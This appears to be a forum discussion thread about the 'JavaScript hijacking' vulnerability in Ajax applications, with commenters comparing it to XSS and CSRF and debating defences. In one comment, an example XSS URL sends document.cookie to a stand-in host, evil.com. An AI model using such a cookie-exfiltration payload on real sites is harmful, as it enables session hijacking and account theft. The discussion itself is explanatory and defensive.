Web 2.0 Under Siege

Robert writes "Security researchers have found what they say is an entirely new kind of web-based attack, and it only targets the Ajax applications so beloved of the 'Web 2.0' movement. Fortify Software, which said it discovered the new class of vulnerability and has named it 'JavaScript hijacking', said that almost all the major Ajax toolkits have been found vulnerable. 'JavaScript Hijacking allows an unauthorized attacker to read sensitive data from a vulnerable application using a technique similar to the one commonly used to create mashups'"

XSS

[Anonymous Coward]

So, how is this different than Javascript injection or Cross-site Scripting?

Re:XSS

[KDan]

I think the very subtle difference is that this time the calls are made using site A's public Ajax API, using site A's authentication token, but are made from a script sitting on site B. The javascript calls return with data from site A, which can then be handled by site B. XSS/JS Injection is more about injecting alien javascript onto site A to make site A call site B with the info it wants.

Daniel

Re:

[Anonymous Coward]

Regarding regular XSS...

XSS/JS Injection is more about injecting alien javascript onto site A ...

OK so far.

... to make site A call site B with the info it wants.

Darn, I thought it was to make site A execute code/retrieve infos from the user's system, not from another site :(

Would you care to develop a little bit?

Re:XSS

[KDan]

Sorry, I was writing this in a rush. I meant site A executes the code that was injected, retrieves the resulting data from site A, and then sends that data over to site B (or some other location). Typically this "data" is stuff like login information...

Daniel

Re:

[Jeremiah Cornelius]

One man's mashup is another man's CSS attack. :-)

Re:

[jrumney]

Not really 'man in the middle', since site B (the exploiter) is at the end of the chain. The vulnerable AJAX application is in the middle here, giving site B privileged access to site A, so more a privilege elevation attack.

Re:

[Itchy Rich]

Another difference is that with a regular web app you'd have to insert the Javascript into multiple pages in order to have complete control over the target app. In order for there to be a danger to the user's data there'd have to be some data on the page where the Javascript was executed or you'd have to take the user to a custom-built phishing site to get them to enter their data for you. With an app written entirely in Javascript you'd only have to get your code executed once, and/or you wouldn't have to

Re:

[Bogtha]

Here [fortifysoftware.com]. For future reference:

1. Throw the words "Fortify Software" at Google.
2. Click on the first link.
3. Click on the prominent link in the middle of their home page.

It's really not that hard to find details. All you really need is the ability to operate a web browser, a search engine, and about thirty seconds of your time.

Re:

[hobo sapiens]

If you have ever written a web page that uses a JSON service, what is being said should make immediate sense.

The question is, how big of a deal is this really? On one hand, you can see how it could be a huge deal if you put sensitive data in a JSON service. I have been a huge fan of AJAX for a while now, but I don't think that it should be used to make complex apps (such as eMail software) for several reasons, and this is one more reason.

Re: don't make complex apps in ajax

[psyclone]

I don't think that [AJAX] should be used to make complex apps (such as eMail software)

Why not? AJAX just uses a basic http request (ala XMLHttpRequest() or equivalent). How is this http request any different than a non-ajax http request?

Any time you are dealing with an authenticated login, you're either reading the session ID from a cookie or the URL. The ajax request sends the cookie (in the header) or the session ID in the URL of the "get/post", just like a request from a browser.

I have a reas

Re:

[KDan]

You're missing the point of the article/announcement completely. The point there is that the session is still associated with the browser when the user visits another page. So that page, even though it's on a different server, can make the browser retrieve, say, all your emails from your gmail account, and then send them wherever it wants.

Daniel

Re:

[Cigarra]

So, how is this different than Javascript injection or Cross-site Scripting?

It is not. They just HAD to make it to Slashdot's front page.

Re:

[Anonymous Coward]

This attack seems to be more like CSRF than XSS. You have authenticated to site A, you have a cookie to site A, you navigate to site B. In CSRF, site B performs a hidden form post to update and change information on your account. In this attack, site B performs cross site AJAX calls to steal, update, or change information on your account.

--Anonymous Coward

Vocabulary Fix

[Nerdfest]

Sadly, this is likely to do very little to stop the use of the word 'mashups'.

Re:

[omeomi]

The only use of the term Mashup that I'm familiar with is the music-oriented one [wikipedia.org]...I guess the "web 2.0" crowd needed another catchy buzzword. Hooray.

Re:

[Gilmoure]

I was wondering what this exploit had to do with the Pirates of Penzance crew singing that Baby Got Back song.

Re:

[omeomi]

Yeah, I'm somewhat disappointed that I got modded down for my comment...the adoption of new "web 2.0" oriented buzzwords is out of control...

Re:

[Seumas]

Or web 2.0.
Or AJAX.

Really, let it be the death of both. Too bad it's a couple years too late.

Re:

[MikeFats]

You're right - who doesn't yearn for the good old Pine and Gopher days? I spit on you AJAX and Web 2.0.

Okay, I'll be the first to ask.

[Z0mb1eman]

How is this different from cross-site scripting?

"In an example attack, a victim who has already authenticated themselves to an Ajax application, and has the login cookie in their browser, is persuaded to visit the attacker's web site. This web site contains JavaScript code that makes calls to the Ajax app. Data received from the app is sent to the attacker."

Re:Okay, I'll be the first to ask.

[daviddennis]

This is much harder to protect against than normal XSS. Why? Because the Ajax does not have to be executed from within the same domain.

Let's say someone wants to attack my site, amazing.com. I browse to their site, remarkable.com, and the exploit code gets loaded into my browser. Remarkable.com can post to amazing.com using AJAX and receive replies as though they were authenticated on my site, because the browser automatically sends the amazing.com cookies with it when accessing an amazing.com URL. It appears to the browser fundamentally as though I was in remarkable.com and then typed the amazing.com URL on to the address bar.

(Of course you could spoof the referer but not from an existing browser session so I think the referer can be relied on in this context.)

If this is so, then it could truly be a throbbing migraine to fix - you would have to use the HTTP referer field to verify that the site calling your Ajax code was valid.

Hope that helps. Not the cheeriest news this morning :-(, but hopefully Prototype will have some kind of fix, and life will go on.

D

Re:Okay, I'll be the first to ask.

[Bogtha]

No, that kind of thing has always been possible since the very first implementation of JavaScript. If you don't need POST, then you can even do it with plain HTML 2.0, no JavaScript.

The problem here is that JSON is a subset of JavaScript and so it is automatically parsed under the local domain's security context when it's included in a document with <script>. There's a few tricks to "hide" it even though it's already been parsed and is sitting in memory, I assume these guys have found a way around that.

Re:Okay, I'll be the first to ask.

[Bogtha]

this only affects AJAX APIs / apps that are designed to be called from other domains.

No, that's the vulnerability. This allows other domains to get the data when the applications don't want to share it.

Bottom line: Don't expose any data / functionality through an API that allows cross-domain XHR unless you add additional precautions.

The news here is that the "additional precautions" that most Ajax libraries take are ineffective.

Re:

[uss_valiant]

this only affects AJAX APIs / apps that are designed to be called from other domains.

No, that's the vulnerability. This allows other domains to get the data when the applications don't want to share it.

Bottom line: Don't expose any data / functionality through an API that allows cross-domain XHR unless you add additional precautions.

The news here is that the "additional precautions" that most Ajax libraries take are ineffective.

Where did you read this in the article? The article has no details. Or do you have another source?

Re:

[Bogtha]

Where did you read this in the article? The article has no details.

Are we reading the same article [cbronline.com]? It lists vulnerable Ajax libraries. It uses GMail and webmail in general as examples of potentially vulnerable web applications. GMail and typical webmail applications aren't designed to be called from other domains in mashups.

Or do you have another source?

Here's the advisory [fortifysoftware.com] (PDF). They override the Object() constructor before calling the JSON so they can capture the data without worrying a

Re:

[uss_valiant]

Just read the original advisory [fortifysoftware.com]. TFA didn't link to it.

You're right, they're right. It's from March 12th, 2007 and it's a different issue than the one I mentioned before.
Putting the JSON data into comment tags or Google's while() approach sound like good defense mechanisms.
Also, using auth tokens in addition to cookies can defeat most scenarios as well (just ensure not to return a valid auth token in any replies that don't require a valid auth token already).

Re:

[MagicM]

Overriding the Object() constructor to do what they did is currently not possible in all browsers, due to the need for "setter" functions. However, since this is now part of JavaScript 1.5, I'm assuming all browsers will have this feature sooner or later. Also, overriding using "function Object" or even "Object.prototype.constructor" currently does not appear to be possible in all browsers. Regardless, the concept of overriding the constructor is valid and in Firefox it's even possible right now.

I like G

Re:

[hobo sapiens]

AJAX allows you to create service oriented applications (SOA). The JSON, XML, etc is a service. Which means that conceivably anyone could access it. It's by design. That's why someone insightfully said "One man's attack is another man's mashup". I don't think it's a huge deal, but I can see where this could get you in trouble if you are serving private data via JSON.

I wonder if there's a way to make the service read the cookie from the calling website? Maybe that's the fix that prototype and others ar

Re:

[MagicM]

+1 Insightful

If your AJAX implementation simply returns JSON data ({json}), there is nothing to worry about. However, if something like "parseData({json})" or "data={json}" is returned (either naively, or on purpose to support cross-domain calls), then you are vulnerable.

Makes me wonder what exactly these vulnerable AJAX toolkits are doing, and why.

Re:

[Bogtha]

If your AJAX implementation simply returns JSON data ({json}), there is nothing to worry about.

This isn't true. The example they use is overriding the Object() constructor. Keeping the JSON out of scope doesn't save you.

Re:

[consumer]

Checking the referer header is ultimately going to fail because it would mean trusting the client to not lie about the referer. There are some better techniques described in the Wikipedia XSRF entry.

Re:

[CoughDropAddict]

Checking the referer header is ultimately going to fail because it would mean trusting the client to not lie about the referer.

In this case the client is the victim. Why would a client spoof Referer in order to attack itself?

It's not perfect, but Referer checking should cover nearly all attacks of this sort.

Re:

[consumer]

Many browsers allow JavaScript to set the document.referrer property.

Re:

[nahdude812]

Even if so it wouldn't affect the HTTP request referrer header.

Better than this is for the server to give the real page request a random token that is unique per session and which it uses for its ajax calls to verify that it's legitimate. The malicious website would have to guess or otherwise intercept which token had been sent. Remember, only the cookies are sent with the call, and the malicious site can't read the cookies, they can only use them. EvilSite.com site wouldn't be able to access other page

Re:

[jkauzlar]

So, I have an honest query for someone who seems knowledgeable about this... does this mean *all* use of AJAX is susceptible to this form of attack or just certain uses.. and in the case of the latter, then what is safe and what is not?

Re:

[daviddennis]

I used to agree with you, because JavaScript has been a huge swamp of errors and compatibility problems.

On the other hand ...

Instant messaging implemented in JavaScript with polling done to the server is really pretty cool, and could not be done without JavaScript.

Reporting new mail on the page, without requiring a refresh, is pretty cool, and could not be done without JavaScript.

Showing who's on the system, in real time, is pretty cool, and could not be done without JavaScript.

Perhaps most importantly, you

Re:

[daviddennis]

Is it really nonsensical?

I would say no, since the only alternative to running an application in a browser is to write a client application that people would have to install on their computers.

• Nowadays, people are going to suspect it's spyware. It will be very hard to get people to install your application.
• You have to furnish a version of it for every platform you need to support, which inevitably means Mac and Linux users get the short end of the stick.
• You have to have a system in place to update it, whic

Re:

[Anonymous Coward]

My thought exactly. More specifically, this sounds like a CSRF attack ( http://en.wikipedia.org/wiki/Cross-site_request_fo rgery [wikipedia.org] ).

Such an attack previously succeeded on Digg (in the form of a white-hat demonstration of a self-Digging website), but that vulnerability has already been patched. The description of the demo attack, which they also refer to as "session riding," is available here: http://4diggers.blogspot.com/ [blogspot.com]

Re:

[michaelmalak]

Cross-site scripting allows a web page browsed by a socially engineered victim to be transmitted to the culprit. JavaScript hijacking is more powerful -- it allows arbitrary data stored on a server (e.g. an entire address book or even all of a user's e-mail on a webmail system) to be transmitted to the culprit.

Re:

[kestasjk]

XSS is a vague term, but lots of people would put "JavaScript hijacking" under the same umbrella as XSS. Your typical XSS attack involves injecting JavaScript into the target domain (this may involve social engineering the victim into going to a url which will inject the JavaScript, eg http://friendly.com/?var=image.src='http://evil.c o m/'+document.cookie [friendly.com] ).

If you can inject the JavaScript needed to do this you can usually also get it to read webmail etc. I won't repeat the things given by others that di

XSRF

[Anonymous Coward]

How is this different than Cross Site Response Forgery?

http://en.wikipedia.org/wiki/Cross-site_request_fo rgery [wikipedia.org]

Re:

[Qzukk]

It seems like the difference between this and XSRF is that this actually uses the results returned from the site, while "standard" XSRF was just hitting www.myspace.com/friend.php?addfriend=imlonely in an img tag or somewhere. ... in other words, it's just as new as "... on the internet!"

quick!

[mastershake_phd]

Upgrade to Web 3.0, quick!

Web 2.0 SP1? (n/t)

[Mateo_LeFou]

no text I said.

Re:

[tfinniga]

Pfft. Old news.

That's exactly what they should do

[Colin Smith]

With ajax, you're essentially opening up the guts of your application to the world, both the server and client side are wide open to exploitation, neither side can trust the other. It's a security nightmare, far more difficult to secure than your regular client/server application.
 

Duh

[evil_Tak]

This has been around for (web) ages. As stated in the summary, it's used all over the place to create mashups because it's one of the only ways around the security requirement that XmlHttpRequest can only talk to the originating server.

Mashups?

[Rob T Firefly]

'JavaScript Hijacking allows an unauthorized attacker to read sensitive data from a vulnerable application using a technique similar to the one commonly used to create mashups'

So back when I made the Beastie Boys rap over the Macarena tune, [spacemutiny.com] I was really hacking the Web 2.0? And here I thought I was just assaulting eardrums and good taste...

Re:

[Any Web Loco]

Genius! Thanks very much - I LOVED that!

Does this mean...

[zappepcs]

that we can sue Morfik? /sarcasm

Where's the problem?

[pimterry]

"In an example attack, a victim who has already authenticated themselves to an Ajax application, and has the login cookie in their browser, is persuaded to visit the attacker's web site. This web site contains JavaScript code that makes calls to the Ajax app. Data received from the app is sent to the attacker."

So essentially it means that the attacker can use the authentication cookie of the user to authenticate them again, and then run javascript with that authentication. But why are AJAX apps storing authentication in cookies? If you need to store authentication (User session id's etc), store them in a variable within the javascript. That'll stay there until a page refresh clears variable status, and how many page refreshes occur with AJAX?

AJAX apps do not need to (and should not!) store user authentication in cookies. Cookies are useful for keeping a continual session open between pages. AJAX needs no continual session. If they don't use cookies, then other sites cannot use that authentication.

Where's the problem? (What am i missing?)

PimTerry

Re:Where's the problem?

[TheSunborn]

The problem is your statement that "AJAX needs no continual session"

AJAX really do need sessions. Just think of Gmail. It it a single AJAX session starting when you login, and finishing when you logout or timeout.

If AJAX don't use sessions, it would have to authenticate itself with username and password with each request it made to the server.

An better solution might be to let the AJAX application explicit handle sessions by storing the session id, and sending it in the post part of all it's requests. But that might be a problem with the browsers history, because it would then loose your session id, if you used the back button.

Re:

[daeg]

Why would it need to reauthenticate with each AJAX request? You can easily just append the session token to the end of your POST (or GET) requests. It goes over the wire in cleartext anyway. All AJAX apps should be using SSL anyway.

You don't run into this specific problem if you do that. New windows with the same domain name (e.g., gmail.com) don't share the same memory as the original window, thus it won't have the authentication token, and won't have the active cookie, either.

Re:

[ergo98]

But why are AJAX apps storing authentication in cookies? If you need to store authentication (User session id's etc), store them in a variable within the javascript.

Store then in javascript? Huh?

It is completely normal -- across the entire industry -- to store session identifiers in cookies. There is nothing special or AJAXy about that.

Re:

[misleb]

So essentially it means that the attacker can use the authentication cookie of the user to authenticate them again, and then run javascript with that authentication. But why are AJAX apps storing authentication in cookies? If you need to store authentication (User session id's etc), store them in a variable within the javascript. That'll stay there until a page refresh clears variable status, and how many page refreshes occur with AJAX?

Well, for one thing, AJAX isn't an all or nothing deal. Many sites/app

Re:

[hobo sapiens]

If you need to store authentication (User session id's etc), store them in a variable within the javascript.

So what then, you pass the userid, sessionid, etc via the querystring? I don't that is making things more secure.

The problem here is that at some point the service has to cough up the data to the caller. If the caller has malicious intent, then what can you do? Meditate on this, I shall. That, or wait for prototype to fix it.

Yes, if I understand right

[Beryllium Sphere(tm)]

If I'm reading the Fortify paper right (I'm in a noisy environment), they say that your proposal will work. The attack is a variation on CSRF, so a similar solution (shared secret nonce) applies.

Things like this are why I have fun in security. Leveraging execute-only access to code into read access to data is a nifty hack.

Re:

[QuoteMstr]

That's going to fail miserably for AOL users at least --- the same user session can result in requests from many different proxies, each with a different IP address.

Also, the "PHP session ID" _is_ stored in a cookie. How else would it work?

Shirky's Law:

[sakusha]

"Social Software is stuff that gets spammed."

The obvious implication of Shirky's Law is that Web 2.0 services are an attractive nuisance and give spammers and other griefers an incentive to game the system. Any new web service has to account for this and build in extremely high levels of security. Obviously nobody is doing this.

Re:

[sakusha]

I would consider Facebook's level of security pretty high.

Riiight. Facebook is absolutely secure and immune from security problems [digg.com] and spam [wordpress.com] because of their preventative measures.

Is that title sarcastic?

[jeevesbond]

I really hope it is. There's no such thing as Web 2.0, some arse decided to put a label on the natural progression the Web was undertaking anyway. It's annoying when authors write that some entirely new, completely re-written version of the Web is--suprisingly--vulnerable, it's the same old Web, just with some new buzz-words.

This is a vulnerability that appears only when passing Javascript between client and server. An attacker has to get a potential-victim who is logged-in to a site, that uses the JSON format to exchange data using AJAX, to visit a page they've setup. Then the attacker can intercept the data as it travels between client and server, a man in the middle attack. From the article:

In an example attack, a victim who has already authenticated themselves to an Ajax application, and has the login cookie in their browser, is persuaded to visit the attacker's web site. This web site contains JavaScript code that makes calls to the Ajax app. Data received from the app is sent to the attacker.

So it's a known method of attack, but because it's aimed at web sites using AJAX it has to be labelled 'Web 2.0'. Ugh.

We've already seen this before

[slashkitty]

It was reported as a problem with the google address book. These guys just generalized the problem because they saw it in many places.

It actually could be pretty nasty. I think the only solution is for you to pass authenticated tokens through the url or input parameters (not through cookies).

It might be a good time to use the firefox NoScript plugin if you're not using it already. Only allow javascript on sites you trust.

Re:We've already seen this before

[aron_wallaker]

There are ways to deal with this. Joe Walker, author of Direct Web Remoting (DWR), talks about the GMail problem and ways to solve it:

http://getahead.org/blog/joe/2007/01/01/csrf_attac ks_or_how_to_avoid_exposing_your_gmail_contacts.ht ml [getahead.org]

Of course, DWR 2.0 will have all this goodness built in. :)

Easy Fix

[Anonymous Coward]

Just serve up an animated cursor before any XML handshakes. This will stop the attackers from exploiting the AJAX piece.

Leaves web to trusted sites only

[failedlogic]

I think the article is a bit exaggerated but if the idea that "Web 2.0" is under attack might be a good time to look at this problem. Consider that a lot of people only surf a few websites (get some news, etc) and use e-mail. Most people don't use the net for anything more.

So if I only visit about 10 websties daily and those 10 sites I'm reasonably sure are safe why would I go anywhere else if it could cause problems to my computer? I've seen and heard from a lot of people fed-up with spyware, adware and vi

Re:

[orclevegam]

All very well and good until one of those ten gets infected by something nasty. I seem to recall seeing an article recently where a big site like CNN or one of them got hit by a worm and was actually serving up infected pages for 48 hours or so till it was discovered and cleaned out. The solution is not to rely on the servers being secure (although that can't be ignored either if you're securing the servers), but to ensure that even IF the servers are compromised that you arn't vulnerable.

As much as I hate

Re:

[failedlogic]

True enough. I just thought I'd throw the idea out. And several banks and as you mention popular sites like CNN haven't escaped hackers. I didn't want to exclude that argument either.

But yeah, hardened OSes using SELinux or OpenBSD or Vista even are steps in the right direction to address this problem.

Backwards quote...

[xxxJonBoyxxx]

From TFA..

Everybody thought that the rise of Ajax as a web programming model would merely exacerbate existing types of attack. Few thought it would give rise to a new class, noted (some random guy).

Actually, I'd claim "everybody" with a toe in the security world thought it was the opposite; we'd start hearing about daily/weekly Ajax security problems as a regular course of business.

(If you think various operating systems have legacy code problems; you don't know "Javascript as implemented by browsers"...)

The Biggest WTF...

[Sam Legend]

The biggest WTF is that somebody is still using javascript. Oops. Wrong site...
(Captcha: backtotheweb1.0)

Detailed report on this problem (no reg required)

[robby_r]

All: I encourage all of you to read the detailed report Fortify wrote on this topic. Its written for developers and explains the problem in clear technical detail. http://www.fortifysoftware.com/advisory.jsp [fortifysoftware.com] (No registration required) Its a long document but I doubt you'll have a lot of questions after reading it. Its refreshing to see reports written like this that don't insult a developer's intelligence.

sigh

[CrazyBrett]

This just sounds like a fancy Cross-Site Request Forgery.

I still maintain that the collective blindness to these security issues comes from our absolute refusal to see HTTP requests as function calls. This is partly due to the silly ideology of the REST crowd.

Rephrase the situation as follows and see if this doesn't make you pee your pants: "Any site can instruct your browser to execute an arbitrary function on another site using your authentication credentials."

Re:sigh

[julesh]

This just sounds like a fancy Cross-Site Request Forgery.

That'll be because it is. It's basically an observation that CSRF on a site which returns data in JSON format allows the attacker to read the content of the result. Well, duh. Of course that happens. It's one of the reasons I've always opposed JSON as a useful format.

The other reason is equally bad, but only applies to "mash up" type situations: the coder of the client has to trust the server with access to all data in the client. This makes it useless in many situations.

The best solution would be to scrap the current security system, make subrequest cookies (including XMLHttpRequests) dependent on both the domain the request goes to *and* the domain of the page that caused the request, and allow XMLHttpRequest to access servers other than the page source. This would both fix CSRF and eliminate the need for JSON. What more do you want? :)

Re:

[Rich0]

I'm still a bit puzzled about why they allow this kind of cross-site interaction in the security model. Shouldn't the sandbox be designed to not allow code on different html files to interact, or to only interact if they were loaded from the same site? And shouldn't the sandbox only allow TCP connections back to the site from which the code came from - and that includes connections created by loading URLs as well. I can see allowing redirections of the entire webpage (ie what is in the location bar), but

Re:

[julesh]

There are probably solutions to this as well (don't allow GET/POST of form variables on redirects, don't allow redirecting at all across domains, don't design web apps with such simple interfaces that can be guessed).

The solution to this requires steps on behalf of both app designers and browser designers:

* Pages that perform potentially harmful actions should only accept data that is POSTed, not URL parameters. Or require a two step process: first request displays a confirmation page, second page will onl

vulnerable == cookie && json && !p

[Anonymous Coward]

An application may be vulnerable if:

- It uses cookies to store session IDs or other forms of credentials; and
- It sends data from server to browser using "JSON" notation; and
- It doesn't require POST data in each request.

A vulnerable application can be fixed by changing any of these three aspects:

- Stop using cookies, and instead supply the credentials in the request's URL or POST data.
- Don't use JSON, or munge your JSON so that it can't be run directly from within a <script> tag; for example, you could put comments around it in the server and strip them off in your client.
- Have the client send some POST data and check for it on the server (a <script> tag can't send POST data).

My preference, and the strategy that I've used in Anyterm and Decimail Webmail, is to not use cookies. To me it actually seems easier to put the session ID in the request, rather than to mess around with cookies.

The advisory, which explains it all but is a bit waffly at the start, is at http://www.fortifysoftware.com/servlet/downloads/p ublic/JavaScript_Hijacking.pdf [fortifysoftware.com]

i told that EVERY time AJAX - 2.0 hype was posted

[unity100]

If you delegate operations and processes to client side, sooner or later they will be finding more ways to exploit it to an extent that it would be a security risk to offer such client side stuff, making anti-virus, anti-spyware, privacy product manufacturers more agitated about it, and in the end drawing visitors away from your site due to blocks, issues, and fear.

XML is so last week. What's really wrong.

[Animats]

XML is now so last week. Really l33t web apps use JSON, which is yet another way to write S-expressions like those of LISP, but now in Javascript brackets.

There are several security problems with JSON. First, some web apps parse JSON notation by feeding it into JavaScript's "eval" [json.org]. Now that was dumb. Some JSON support code "filters" the incoming data before the EVAL, but the most popular implementation missed filtering something and left a hole. Second, there's an attack similar to the ones involving redefining XMLHttpRequest: redefining the Array constructor. [getahead.org] (Caution, page contains proof of concept exploit.)

The real problem is JavaScript's excessive dynamism. Because you can redefine objects in one script and have that affect another script from a different source, the language is fundamentally vulnerable. It's not clear how to allow "mashups" and prevent this. The last attempt to fix this problem involved adding restrictions to XMLHttpRequest, but that only plugged some of the holes.

As a minimum, it's probably desirable to insist in the browser that, on secure pages, all Javascript and data must come from the main page of the domain. No "mashups" with secure pages.

half troll, half tart

[rodentia]

I'll ignore the debunked *XML is S-expressions* bait for the chance to second your critique of JavaScript and the inherent problems with the AJ part of AJAX.

Re:

[td]

He doesn't say "XML is S-expressions" (though the main arguer to the contrary [prescod.net] skips around a lot without actually refuting the proposition), he says "JSON is S-expressions". If you spend about 45 seconds reading Introducing JSON [json.org], sure enough, JSON is S-expressions.

Re:XML is so last week. What's really wrong.

[julesh]

There are several security problems with JSON. First, some web apps parse JSON notation by feeding it into JavaScript's "eval". Now that was dumb.

You don't say. My first thought on hearing about the entire idea was "why would you want to let a foreign server run its code on your page?"

The real problem is JavaScript's excessive dynamism. Because you can redefine objects in one script and have that affect another script from a different source, the language is fundamentally vulnerable.

Err... if I don't let foreign code execute (e.g. by doing 'var e = document.createElement("script"); e.src = "http://www.someotherserver.com/potential-security -risk"; document.body.appendChild (e);', which I've seen many scripts do) how can another site redefine the objects in my script? I think the vulnerability is that most JS programmers are too willing to let other sites execute arbitrary code in their own context, which really ain't good.

The last attempt to fix this problem involved adding restrictions to XMLHttpRequest, but that only plugged some of the holes.

The fix seems obvious to me:

* cookies in subrequests must be tied to the domain of the page that initiated the request as well as the domain the request goes to; this reduces the possibility of CSRF. So if www.a.com has a web page that requests data from www.b.com, it will only send a cookie if www.b.com set one in response to a previous request from www.a.com. This applies to SCRIPT tags, to IFRAME tags, to IMG tags, to LINK tags, etc.

* XMLHttpRequest must not be tied to the same-domain policy. Attempts to access a different domain should result in a request for confirmation from the user for the first time any particular requester/receiver domain pair is used. This means mashups (and other applications that need cross-domain access) can be written that do not need to use JSON. JSON parsing through script insertion or eval() is insecure, and should be deprecated.

As a minimum, it's probably desirable to insist in the browser that, on secure pages, all Javascript and data must come from the main page of the domain. No "mashups" with secure pages.

Scripts, yes. I don't see the need to ensure that data originates in the same domain.

eval is evil

[Beryllium Sphere(tm)]

>First, some web apps parse JSON notation by feeding it into JavaScript's "eval" [json.org]. Now that was dumb. Some JSON support code "filters" the incoming data before the EVAL, but the most popular implementation missed filtering something and left a hole.

Isn't this the same lesson that led to giving up on suid shell scripts? Try to "filter" input to a rich general-purpose language and you always miss something. Especially when the language can be tweaked at runtime, be it with an IFS environment vari

Old truths new truths...

[CodeShark]

AKA, the security programmer's favorite adage: "The user is the enemy."

That is, when ANY new technique or code module is to be used in a production environment, it should not be considered ready until it has been thoroughly attacked by a person who has the kind of mind-set that will expose code vulnerabilities before a user (or set of users) finds them.

Trouble is, most IT organizations have a hard sell to get that type of person within the company -- first, because an "inside the firewall" attacker is count

I give up.

[UnknowingFool]

First the MS cursor exploit [slashdot.org], now this. How are we supposed to surf the web, anymore? That's it! I'm going back to Morse Code:
_-_- ___ __ - __- - _ --- ___ __ - --- _ ___ -__-

Examples?

[joelhayhurst]

Are there any working examples of this problem we could see? I'm having trouble understanding exactly what the issue is supposed to be.

Stop misusing this term, okay?

[Lethyos]

“Web 2.0” is not AJAX and “AJAX” is not Web 2.0. These terms are not synonyms nor does one necessarily imply the other. Yes, AJAX is an important participant, but Web 2.0 is really about service architecture [oreillynet.com] that is equally consumable by machines and people—a notion that somewhat embodies the original vision of the Web. The article title “Web 2.0 Under Siege” is misleading nonsense. It is analogous to stating that programming is “under siege” because

nonsense

[steveoc]

What a crock. This has got zero to do with ajax. For example, even with 'insecure' PHP - the first line of any backend ajax code should read something like ..

require_once("include/session.inc");

Where session.inc reads the user cookie (or whatever the authentication mechanism your app uses), and sets up a validated user.

There is NO DIFFERENCE in the way users are authenticated between server side code that renders a regular page, and server side code that is called by ajax. One generally returns HTML, the ot

Re:

[steveoc]

excellent reply - that made heaps of sense.

Thx

ASP.NET Ajax is not affected

[ThinkFr33ly]

ASP.NET Ajax [asp.net], with the default settings, is protected [asp.net] against these attacks.

Re:

[Anonymous Coward]

BBZZZT! I'll bite... "Web 2.0" is a term coined by Tim O'Reilly (of O'Reilly Media; you know, those books with the animals on the cover) as a way of classifying a new generation of web-based applications, a shift from static text and html to interactivity and user-participation in creating the content of a site. The media picked up on it later and gave it buzzwordyness. People who do not have a background in and/or an understanding of technology assume that the media made it up.

Re:

[illegalcortex]

You should get the stick out of your ass. Discuss... ;)
Seriously, when they said Web 2.0, I knew what they were talking about (it's the "Under Seige" part that I felt was dumb). I knew they were talking about javascript and XMLHttpRequest stuff that is frequently called AJAX (another term which some people whine about). Do you even know what a buzzword is? It's something you add to a product because it's popular. Like "object oriented" or "xml" when it's irrelevant to the actual functioning of the prod

Re:

[julesh]

Ignorant media people and unscrupulous "consultants".

My company lost a client last year, because we were realistic with telling him what we could achieve over his web site. Meanwhile a "Web 2.0 consultant" told him that using the power of Web 2.0 he could keep my client's web site in the top google spot for search terms of his choice. My client was gullible enough to believe him.

Re:

[crabpeople]

"Discuss" is a word appended to an obvious, usually one line statements, that proves the poster has only basic insight into the topic and just wants to leech karma off of more insightful replies.

Re:

[borkus]

I return pain text

I so want to return pain text to certain users.

if text_body == ALL_CAPS
        return PAIN_TEXT

Re:

[borkus]

What because you can cross-site script XML? Enlighten me.

Re:

[julesh]

Even if the script produces an XML result, you can still make the request using the same technique. Thus, if you have a single step method for making some potentially dangerous transaction, that transaction can be performed by an attacker. What they can't do is extract meaningful data from the result.

All of these vulnerabilities show in my mind that the cookie model is fundamentally flawed. Cookies should not be associated with the domain of the server that set them, but the pair (, ). This would also i

Re:

[borkus]

Ah, so the vulnerability would existing to manipulate data on the server using the customer's credentials, not just to show/manipulate data on the client. I was thinking solely on the client side.

Thanks - I'd give ya a +1 helpful. Maybe someone else will oblige me.

Re:Executing 3rd party code by default is insecure

[nuzak]

> Like building a submarine out of swiss cheese.

I suspect a submarine built out of a nice solid gruyere would probably not be terribly seaworthy either. When it comes to the structural integrity of hull materials, cheese tends to rank pretty low.

Re:

[treeves]

You'd be amazed at what they can do with a good, basic HY80 Cheddar. Just gotta make sure to keep the rats out. They'll get into the bilges and nibble away, and on your first deep dive, bam, you've got flooding!

Re:

[steveoc]

lol, wish I had mods points to mod the whole cheese discussion up.

Im sure I have tried once to bite into cheese so hard that it would crack your teeth .. and Im sure there exists some cheeses which are not only non-porous, but actively REPEL water .. that would make for a good submarine methinks.

Re:Executing 3rd party code by default is insecure

[julesh]

NoScript seems to be a reasonable compromise. No browser I'm aware of takes this approach by default.

IE7 on default install of Win2K3 with latest updates & service packs does this. Whenever you visit a web site that has javascript, it pops up asking whether you want to add it to the trusted sites list, and blocks the script if you don't.